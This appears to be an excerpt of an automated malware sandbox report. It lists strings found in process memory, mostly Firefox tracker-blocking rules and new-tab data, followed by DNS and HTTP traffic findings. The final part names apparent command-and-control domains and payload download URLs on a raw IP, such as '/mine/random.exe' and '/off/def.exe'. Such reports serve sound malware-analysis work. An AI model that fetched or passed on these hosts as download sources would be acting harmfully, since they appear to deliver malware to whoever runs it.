Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]][{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.faceboo
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div 
class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C068000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3260229875.0000019E4C0EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BFF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/6
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/6ae
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/X
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/aa
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/i
Source: file.exe, file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe)
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeW
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeg
Source: file.exe, file.exe, 00000000.00000003.2356103217.000000000155D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe1
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeV
Source: file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
